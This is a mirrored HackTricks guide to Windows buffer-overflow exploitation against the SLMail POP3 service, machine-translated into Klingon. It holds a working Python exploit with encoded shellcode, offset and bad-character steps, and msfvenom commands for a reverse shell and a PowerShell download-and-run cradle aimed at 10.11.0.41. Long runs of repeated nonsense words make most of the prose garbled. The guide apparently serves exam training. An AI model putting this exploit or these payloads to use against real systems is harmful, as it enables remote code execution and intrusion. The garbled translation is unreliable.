Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

24 KiB

Raw Permalink Blame History

Windows Exploiting (Basic Guide - OSCP lvl)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Start installing the SLMail service

Restart SLMail service

Every time you need to restart the service SLMail you can do it using the windows console:

net start slmail

QaStaHvIS python exploit template

#!/usr/bin/env python

import socket

# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Define the target IP and port
target_ip = "TARGET_IP_ADDRESS"
target_port = TARGET_PORT_NUMBER

# Connect to the target
s.connect((target_ip, target_port))

# Craft the payload
payload = "PAYLOAD"

# Send the payload to the target
s.send(payload)

# Receive the response from the target
response = s.recv(1024)

# Print the response
print(response)

# Close the connection
s.close()

Replace TARGET_IP_ADDRESS with the IP address of the target machine and TARGET_PORT_NUMBER with the port number you want to exploit. Replace PAYLOAD with the payload you want to send to the target machine.

Save the script with a .py extension and execute it to exploit the target machine.

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

ghItlh Immunity Debugger Font

Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK vItlhutlh

Immunity Debugger Daq attach

File --> Attach

'ej START button ngeH

exploit jImej 'ej EIP vItlhutlh

DaH jImej service vItlhutlh Hoch 'ej vItlhutlh Hoch vItlhutlh Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Qa'legh exploit buffer vItlhutlh je pattern 'ej lauch exploit.

QaStaHvIS crash chenmoH, 'ach EIP patlh vItlhutlh:

qaStaHvIS pattern vItlhutlh 'ej patlh vItlhutlh 'e' vItlhutlh:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438

Qapla'! 2606 vItlhutlh EIP vIlo'laHbe'.

Qapla'! exploit buffer vIlo'laHbe' vItlhutlh.

buffer = 'A'*2606 + 'BBBB' + 'CCCC'

jIqetlh EIP crashed vItlhutlh 42424242 ("BBBB") poQ.

cha'logh vItlhutlh.

Shellcode jatlhqa'wI' qutlh

600B jatlhqa'wI' powerfull shellcode.

bufer vItlhutlh:

buffer = 'A'*2606 + 'BBBB' + 'C'*600

lIj:

DaH jImejDaq 'ej 'ej length of the usefull shellcode cha'logh EBP check.

In this case we have from 0x0209A128 to 0x0209A2D6 = 430B. cha'logh.

Check for bad chars

Change again the buffer:

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars

badchars bIjatlh 0x01 vItlhutlh.

exploit vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh

!mona modules    #Get protections, look for all false except last one (Dll of SO)

tlhIngan Hol:

yItlhutlh memory maps. DLl jatlh search:

Rebase: False
SafeSEH: False
ASLR: False
NXCompat: False
OS Dll: True

vaj memory jatlh JMP ESP bytes, ghorgh execute:

!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case

ghItlh, vaj vay' Daghaj vItlhutlh:

vaj, DaH jatlh: _0x5f4a358f_

shellcode qapla'

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'

ghItlh 'ej 'ach exploit pagh not working 'ach should (ImDebg shellcode reached jImej), msfvenom create shellcodes parameters vItlhutlh.

shellcode beginning NOPS Add 'ej JMP ESP return address use 'ej exploit finish:

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)

buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port

{% hint style="warning" %} Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! 